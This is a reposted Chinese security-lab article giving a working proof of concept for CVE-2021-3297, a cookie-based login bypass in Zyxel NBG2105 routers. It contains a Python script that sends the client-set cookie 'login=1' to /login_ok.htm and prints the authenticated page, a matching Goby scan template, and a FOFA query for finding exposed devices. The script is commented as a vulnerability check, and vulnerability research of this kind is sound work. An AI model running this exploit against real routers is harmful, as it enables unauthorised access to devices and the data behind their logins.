Zyxel NBG2105 身份验证绕过 CVE-2021-3297


文章来源:Khan安全攻防实验室

Zyxel NBG2105 身份验证绕过 CVE-2021-3297

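POC(检测逻辑:仅携带客户端自行设置的 Cookie `login=1` 请求 `/login_ok.htm`,若返回 200 且页面包含 "GMT" 即判定存在漏洞;该特征较宽泛,可能产生误报,结果应结合设备固件版本核实):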


# /usr/bin/python3
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

"""
    by Sec
    fofa语句:app="ZyXEL-NBG2105"
"""


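def poc(url):
    """Check one device for the CVE-2021-3297 cookie-based login bypass.

    Sends a single GET for ``/login_ok.htm`` whose only credential is the
    client-set cookie ``login=1``, then prints a verdict. A positive verdict
    means the device answered that request as if a session existed, i.e. it
    accepted a value the client controls as its authentication state.

    Args:
        url: Base URL of the device's web interface, including the scheme.
            A trailing slash is tolerated.

    Returns:
        None. The verdict (and, on a positive verdict, the response body)
        is written to stdout.
    """
    # Drop a trailing "/" so the probe path is not requested as "//login_ok.htm".
    exp = url.rstrip("/") + "/login_ok.htm"

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        # The whole check rests on this header: no password or server-issued
        # session token is sent, only a cookie the client sets itself.
        "cookie": "login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        # verify=False turns off certificate validation, so the peer's
        # identity is not checked and the verdict describes whatever host
        # answered at this address.
        response = requests.get(url=exp, headers=header, verify=False, timeout=10)
    except requests.RequestException as err:
        # Only transport/URL errors are reported as a failed request; any
        # other exception is a bug in this script and is left to propagate.
        print(exp + "请求失败!! " + str(err))
        return

    # Heuristic only: any 200 response whose body contains "GMT" is reported
    # as affected, so an unrelated page can produce a false positive. Confirm
    # a hit against the device's firmware version before acting on it.
    if response.status_code == 200 and "GMT" in response.text:
        print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
        print("数据信息如下:")
        # NOTE(review): the full body is echoed; it presumably comes from the
        # authenticated area of the device, so treat captured output as
        # sensitive - confirm what the page contains.
        print(response.text)
    else:
        print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")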


def main():
    """Prompt on stdin for one base URL and run the check against it."""
    target = input("请输入目标url:")
    poc(str(target))


# Run the interactive check only when executed as a script, not on import.
if __name__ == "__main__":
    main()

Zyxel_NBG2105_Cookie_CVE_2021_3297.json

{
      "Name": "Zyxel NBG2105 Cookie CVE-2021-3297",
      "Level": "2",
      "Tags": [],
      "GobyQuery": "app=\"ZyXEL-NBG2105\"",
      "Description": "Zyxel NBG2105 Cookie CVE-2021-3297",
      "Product": "",
      "Homepage": "Sec",
      "Author": "Sec",
      "Impact": "",
      "Recommandation": "",
      "References": [
            "https://gobies.org/"
      ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/login_ok.htm",
                        "follow_redirect": true,
                        "header": {
                              "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
                              "cookie":"login=1"
                        },

                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "GMT",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "PostTime": "2021-04-06 10:02:37",
      "GobyVersion": "1.8.239"
}

本文来源Khan安全攻防实验室,经授权后由张发布,观点不代表华盟网的立场,转载请联系原作者。
